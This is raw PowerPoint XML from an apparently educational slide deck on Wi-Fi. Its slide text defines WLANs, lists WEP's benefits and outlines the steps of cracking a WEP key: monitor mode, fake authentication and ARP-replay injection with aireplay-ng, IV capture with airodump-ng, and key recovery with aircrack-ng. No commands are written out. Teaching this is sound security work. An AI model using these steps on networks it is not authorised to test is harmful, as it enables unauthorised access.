      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B9F606B4-D837-424D-9D67-E0777070B351}" type="pres">
      <dgm:prSet presAssocID="{C4DBD477-23B9-4D9A-B312-206D8D04074D}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B9B9A95E-D1FF-45E4-A2CC-CFD1E878CD57}" type="pres">
      <dgm:prSet presAssocID="{C4DBD477-23B9-4D9A-B312-206D8D04074D}" presName="bgChev" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3" custScaleX="104182" custScaleY="220382"/>
      <dgm:spPr>
        <a:effectLst>
          <a:reflection blurRad="6350" stA="50000" endA="300" endPos="38500" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
        </a:effectLst>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{597F42AC-057E-43DE-8674-CCC1B3F0B7D1}" type="pres">
      <dgm:prSet presAssocID="{C4DBD477-23B9-4D9A-B312-206D8D04074D}" presName="txNode" presStyleLbl="fgAcc1" presStyleIdx="1" presStyleCnt="3" custScaleY="220382">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6CA07512-F8B1-42E8-806B-76B39C4EE79D}" type="pres">
      <dgm:prSet presAssocID="{12FFE6CD-DB4E-439A-B87A-EBEF8C48E10A}" presName="compositeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1E83C46C-8512-444C-B1C9-6B2EBDD2161D}" type="pres">
      <dgm:prSet presAssocID="{BFB5096B-CB88-4898-9CA6-3553056016AA}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{68038528-9693-495B-8A02-2D83BE99FA3E}" type="pres">
      <dgm:prSet presAssocID="{BFB5096B-CB88-4898-9CA6-3553056016AA}" presName="bgChev" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3" custScaleX="110907" custScaleY="220382"/>
      <dgm:spPr>
        <a:effectLst>
          <a:reflection blurRad="6350" stA="50000" endA="300" endPos="38500" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
        </a:effectLst>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{7A0F3292-CE0D-4C1C-9D64-91A31D486FCE}" type="pres">
      <dgm:prSet presAssocID="{BFB5096B-CB88-4898-9CA6-3553056016AA}" presName="txNode" presStyleLbl="fgAcc1" presStyleIdx="2" presStyleCnt="3" custScaleY="220382" custLinFactNeighborX="32" custLinFactNeighborY="-2892">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{84A71801-BD4C-44CA-97BE-912E35270615}" type="presOf" srcId="{BFB5096B-CB88-4898-9CA6-3553056016AA}" destId="{7A0F3292-CE0D-4C1C-9D64-91A31D486FCE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{FF1B1626-1183-4C35-A80F-81707B0001CB}" srcId="{B5CD74DB-2E30-4E11-A786-C26BABB1B400}" destId="{BFB5096B-CB88-4898-9CA6-3553056016AA}" srcOrd="2" destOrd="0" parTransId="{B5FF8363-8B1D-43F1-BFCA-A8670ABF6B2A}" sibTransId="{02A9D25C-8C68-4DFD-AB5C-8278CF91392B}"/>
    <dgm:cxn modelId="{5226FA28-37FB-4E52-AA99-12240116C8C1}" type="presOf" srcId="{C4DBD477-23B9-4D9A-B312-206D8D04074D}" destId="{597F42AC-057E-43DE-8674-CCC1B3F0B7D1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{05A0553E-A7A1-449E-92AD-8BD9CA835E74}" srcId="{B5CD74DB-2E30-4E11-A786-C26BABB1B400}" destId="{BF36CCBD-7A63-4503-869B-DBAC155FBBA4}" srcOrd="0" destOrd="0" parTransId="{426BF1B9-9B45-470F-9559-4F87C8205F50}" sibTransId="{403C6A54-C41C-4EC0-A83F-92B4A6E46B4A}"/>
    <dgm:cxn modelId="{D876B46F-DDFB-457C-B181-020426751BD0}" type="presOf" srcId="{B5CD74DB-2E30-4E11-A786-C26BABB1B400}" destId="{97B063DD-E179-4E1B-82CD-A26B7705DC8E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{F60D589B-CCC5-4F3D-B0A7-853C51CF6861}" srcId="{B5CD74DB-2E30-4E11-A786-C26BABB1B400}" destId="{C4DBD477-23B9-4D9A-B312-206D8D04074D}" srcOrd="1" destOrd="0" parTransId="{56E97C59-B95C-45E9-9044-0C5265A13584}" sibTransId="{12FFE6CD-DB4E-439A-B87A-EBEF8C48E10A}"/>
    <dgm:cxn modelId="{1CD06BFB-A513-42C0-9E52-23C49FE3B0F2}" type="presOf" srcId="{BF36CCBD-7A63-4503-869B-DBAC155FBBA4}" destId="{00A13D14-7267-4EB4-A4B0-2586EA810C00}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{C4E81A84-C20A-4028-B466-C8D2DC1D0304}" type="presParOf" srcId="{97B063DD-E179-4E1B-82CD-A26B7705DC8E}" destId="{1FAC5434-5693-4F0A-9B2A-A04BFB729E68}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{2BAC147E-F3B3-4F06-B3E4-93DD5DDCE7CF}" type="presParOf" srcId="{1FAC5434-5693-4F0A-9B2A-A04BFB729E68}" destId="{C4274C8A-5DD5-4259-A16A-29BFF8BC338F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{A93101D6-F845-4BCF-9DA5-F59D14F377D3}" type="presParOf" srcId="{1FAC5434-5693-4F0A-9B2A-A04BFB729E68}" destId="{00A13D14-7267-4EB4-A4B0-2586EA810C00}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{2237F7D1-9F3B-4C94-8BF2-0B7A341D0B79}" type="presParOf" srcId="{97B063DD-E179-4E1B-82CD-A26B7705DC8E}" destId="{49961D21-79FD-4837-B49E-CA50087F5D85}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{7589D527-A905-4B72-9DBB-0666434677C4}" type="presParOf" srcId="{97B063DD-E179-4E1B-82CD-A26B7705DC8E}" destId="{B9F606B4-D837-424D-9D67-E0777070B351}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{58CF94FA-C791-4DA5-948A-DEB669E85C64}" type="presParOf" srcId="{B9F606B4-D837-424D-9D67-E0777070B351}" destId="{B9B9A95E-D1FF-45E4-A2CC-CFD1E878CD57}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{1AA90171-2328-4BEF-82DF-B55D0068CA27}" type="presParOf" srcId="{B9F606B4-D837-424D-9D67-E0777070B351}" destId="{597F42AC-057E-43DE-8674-CCC1B3F0B7D1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{D6F985A8-BDFA-43F8-843A-BA78C1C87B65}" type="presParOf" srcId="{97B063DD-E179-4E1B-82CD-A26B7705DC8E}" destId="{6CA07512-F8B1-42E8-806B-76B39C4EE79D}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{5AA6D801-DCC7-498C-9052-3C24B4E08BD1}" type="presParOf" srcId="{97B063DD-E179-4E1B-82CD-A26B7705DC8E}" destId="{1E83C46C-8512-444C-B1C9-6B2EBDD2161D}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{0CE9068B-4290-4926-BB13-FE6AF5CFB458}" type="presParOf" srcId="{1E83C46C-8512-444C-B1C9-6B2EBDD2161D}" destId="{68038528-9693-495B-8A02-2D83BE99FA3E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{FBBE66FC-A7FE-401B-BBE7-4AF4DC06EA75}" type="presParOf" srcId="{1E83C46C-8512-444C-B1C9-6B2EBDD2161D}" destId="{7A0F3292-CE0D-4C1C-9D64-91A31D486FCE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1881B-C7A2-4D32-A2B4-6A7FE08F6E20}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="-9152247" y="-1403415"/>
          <a:ext cx="10934832" cy="10934832"/>
        </a:xfrm>
        <a:prstGeom prst="blockArc">
          <a:avLst>
            <a:gd name="adj1" fmla="val 18900000"/>
            <a:gd name="adj2" fmla="val 2700000"/>
            <a:gd name="adj3" fmla="val 19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B74994-C832-4D3A-9DFF-333B107AD307}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1160983" y="812800"/>
          <a:ext cx="10951667" cy="162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032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itchFamily="34" charset="0"/>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="3100" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Wi-Fi refers to wireless  local area network (WLAN)  based on IEEE 802.11</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="3100" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1160983" y="812800"/>
        <a:ext cx="10951667" cy="1625600"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3FC56351-BFC9-4FA5-A9FC-4574E2939D2B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="155549" y="863600"/>
          <a:ext cx="2010867" cy="15239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DD1057-645B-4F6C-AF92-55518F90EEFB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1751888" y="3251199"/>
          <a:ext cx="10360761" cy="162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032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itchFamily="34" charset="0"/>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="3100" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>It is widely used technology for wireless communication across a radio channel</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="3100" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1751888" y="3251199"/>
        <a:ext cx="10360761" cy="1625600"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{06D6C753-C024-4E41-9D85-D4CB60BE2846}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="803960" y="3225800"/>
          <a:ext cx="1895855" cy="16763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75A6E1-FEB2-4B4B-AF99-50C91EBC1DB1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1160983" y="5689600"/>
          <a:ext cx="10951667" cy="162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032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tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Device such as personal computer , video-game console , smartphone , etc. use to connect to  a network resource such as the internet via wireless network  access point.</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="3100" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1160983" y="5689600"/>
        <a:ext cx="10951667" cy="1625600"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DB9DA43C-6DB5-4471-95D9-C6C647C685F9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="79349" y="5664200"/>
          <a:ext cx="2163267" cy="16763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1A2270-E771-4655-B665-1B486693EC5B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="-245376" y="246027"/>
          <a:ext cx="1635844" cy="11450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1.</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="3400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1" y="573197"/>
        <a:ext cx="1145091" cy="490753"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0B7BE075-5BC7-431C-9477-A834CBBDEAC0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3514200" y="-2369106"/>
          <a:ext cx="1063298" cy="5801516"/>
        </a:xfrm>
        <a:prstGeom prst="round2SameRect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200" kern="1200" dirty="0"/>
            <a:t>Easy to configure</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="5100" kern="1200" dirty="0"/>
            <a:t>.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1145091" y="51909"/>
        <a:ext cx="5749610" cy="959486"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{20A58F3B-DD3F-43A3-875D-4579A8FD7627}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="-245376" y="1688054"/>
          <a:ext cx="1635844" cy="11450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2.</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="3400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1" y="2015224"/>
        <a:ext cx="1145091" cy="490753"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{202EFA51-8867-4919-B960-1E0796925DBD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3514200" y="-926431"/>
          <a:ext cx="1063298" cy="5801516"/>
        </a:xfrm>
        <a:prstGeom prst="round2SameRect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100" kern="1200" dirty="0"/>
            <a:t>Widely supported security system.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1145091" y="1494584"/>
        <a:ext cx="5749610" cy="959486"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BCB0D47D-B3F9-4FE8-84DE-923AEAA1F95C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="-245376" y="3130081"/>
          <a:ext cx="1635844" cy="11450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3.</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="3400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1" y="3457251"/>
        <a:ext cx="1145091" cy="490753"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{09B684CB-CA4C-4031-A719-B38D55EFD2A8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3514200" y="515595"/>
          <a:ext cx="1063298" cy="5801516"/>
        </a:xfrm>
        <a:prstGeom prst="round2SameRect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Secures your wireless network better than no encryption at all.</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="3100" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1145091" y="2936610"/>
        <a:ext cx="5749610" cy="9594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74C8A-5DD5-4259-A16A-29BFF8BC338F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5896" y="587166"/>
          <a:ext cx="3565859" cy="301752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3850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13D14-7267-4EB4-A4B0-2586EA810C00}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="992476" y="916513"/>
          <a:ext cx="2882026" cy="3017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Start the wireless interface in monitor mode on the specific access point channel</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="2800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1076888" y="1000925"/>
        <a:ext cx="2713202" cy="2848696"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B9B9A95E-D1FF-45E4-A2CC-CFD1E878CD57}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3980683" y="587166"/>
          <a:ext cx="4062269" cy="301752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3850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F42AC-057E-43DE-8674-CCC1B3F0B7D1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5215468" y="916513"/>
          <a:ext cx="2882026" cy="3017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Test the injection capability of the wireless device to the access point</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="2700" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5299880" y="1000925"/>
        <a:ext cx="2713202" cy="2848696"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{68038528-9693-495B-8A02-2D83BE99FA3E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8203675" y="587166"/>
          <a:ext cx="3793502" cy="301752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3850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F3292-CE0D-4C1C-9D64-91A31D486FCE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="9304077" y="916513"/>
          <a:ext cx="2882026" cy="3017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Use a tool such as aireplay-ng to do a fake authentication with the access point</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="2700" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="9388489" y="1000925"/>
        <a:ext cx="2713202" cy="28486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74C8A-5DD5-4259-A16A-29BFF8BC338F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="934" y="631594"/>
          <a:ext cx="3941466" cy="292607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3850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13D14-7267-4EB4-A4B0-2586EA810C00}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1126630" y="974653"/>
          <a:ext cx="2904648" cy="2926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Start Wi-Fi sniffing tool such as </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2700" kern="1200" dirty="0" err="1"/>
            <a:t>airodump</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2700" kern="1200" dirty="0"/>
            <a:t>-ng or Cain &amp; Abel with a </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2700" kern="1200" dirty="0" err="1"/>
            <a:t>bssid</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2700" kern="1200" dirty="0"/>
            <a:t> filter to collect unique </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2700" kern="1200" dirty="0" err="1"/>
            <a:t>Ivs</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2700" kern="1200" dirty="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="2700" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1211704" y="1059727"/>
        <a:ext cx="2734500" cy="2755930"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B9B9A95E-D1FF-45E4-A2CC-CFD1E878CD57}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4180730" y="631594"/>
          <a:ext cx="3583564" cy="292607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3850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F42AC-057E-43DE-8674-CCC1B3F0B7D1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5169911" y="963527"/>
          <a:ext cx="2904648" cy="2926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Start a Wi-fi packet encryption tool such as aireplay—ng in ARP request reply mode to inject packets</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="2800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5254985" y="1048601"/>
        <a:ext cx="2734500" cy="2755930"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{68038528-9693-495B-8A02-2D83BE99FA3E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8181574" y="631594"/>
          <a:ext cx="3814885" cy="292607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3850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F3292-CE0D-4C1C-9D64-91A31D486FCE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="9287345" y="925129"/>
          <a:ext cx="2904648" cy="2926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Run</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2500" kern="1200" baseline="0" dirty="0"/>
            <a:t> a cracking tool such as </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2700" kern="1200" baseline="0" dirty="0" err="1"/>
            <a:t>aircrack</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2700" kern="1200" baseline="0" dirty="0"/>
            <a:t>-ng</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2500" kern="1200" baseline="0" dirty="0"/>
            <a:t> to extract encryption key from the IVs.</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="2500" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="9372419" y="1010203"/>
        <a:ext cx="2734500" cy="275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8E765-BAC7-4CE6-BBA7-F03D52349A7F}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>23/05/28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9AB23-A0C5-4EEB-A6B1-57DC037EA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03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28700" y="8024854"/>
            <a:ext cx="17259300" cy="3572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762000" y="7280117"/>
            <a:ext cx="16916400" cy="1833563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762000" y="5829300"/>
            <a:ext cx="16916400" cy="1371600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="4300">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:shade val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="816422" indent="0" algn="ctr">
              <a:buNone/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1632844" indent="0" algn="ctr">
              <a:buNone/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="2449266" indent="0" algn="ctr">
              <a:buNone/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="3265688" indent="0" algn="ctr">
              <a:buNone/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="4082110" indent="0" algn="ctr">
              <a:buNone/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="4898532" indent="0" algn="ctr">
              <a:buNone/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="5714954" indent="0" algn="ctr">
              <a:buNone/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="6531376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23/05/28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6459200" y="9710928"/>
            <a:ext cx="1517904" cy="370332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23/05/28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16000" y="823915"/>
            <a:ext cx="3657600" cy="8777288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823915"/>
            <a:ext cx="12496800" cy="8777288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23/05/28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23/05/28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7162800" y="114301"/>
            <a:ext cx="5791200" cy="433388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6459200" y="9710928"/>
            <a:ext cx="1517904" cy="370332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28700" y="5167354"/>
            <a:ext cx="17259300" cy="3572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62000" y="2514600"/>
            <a:ext cx="16916400" cy="1828800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r">
              <a:buNone/>
              <a:defRPr sz="36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23/05/28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0950" y="4420628"/>
            <a:ext cx="17373600" cy="1777238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603504" y="685800"/>
            <a:ext cx="17373600" cy="126187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609600" y="2400300"/>
            <a:ext cx="8382000" cy="708660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9296400" y="2400300"/>
            <a:ext cx="8686800" cy="708660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23/05/28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609600" y="8115300"/>
            <a:ext cx="17221200" cy="1323975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62888" y="1000125"/>
            <a:ext cx="8581112" cy="959643"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="32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3600" b="1"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:buNone/>
              <a:defRPr sz="3200" b="1"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:buNone/>
              <a:defRPr sz="2900" b="1"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:buNone/>
              <a:defRPr sz="29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9290051" y="1000125"/>
            <a:ext cx="8584482" cy="959643"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="32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3600" b="1"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:buNone/>
              <a:defRPr sz="3200" b="1"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:buNone/>
              <a:defRPr sz="2900" b="1"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:buNone/>
              <a:defRPr sz="29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2888" y="1974056"/>
            <a:ext cx="8581112" cy="5912645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9297460" y="1974056"/>
            <a:ext cx="8577072" cy="5912645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23/05/28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459200" y="9715500"/>
            <a:ext cx="1524000" cy="370332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28700" y="9029701"/>
            <a:ext cx="17259300" cy="3572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603504" y="685800"/>
            <a:ext cx="17373600" cy="126187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23/05/28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23/05/28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28700" y="8773676"/>
            <a:ext cx="17259300" cy="3572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914400" y="8229600"/>
            <a:ext cx="16916400" cy="781050"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:buNone/>
              <a:defRPr sz="36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914401" y="914400"/>
            <a:ext cx="6016626" cy="7200900"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="2500"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:buNone/>
              <a:defRPr sz="2100"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
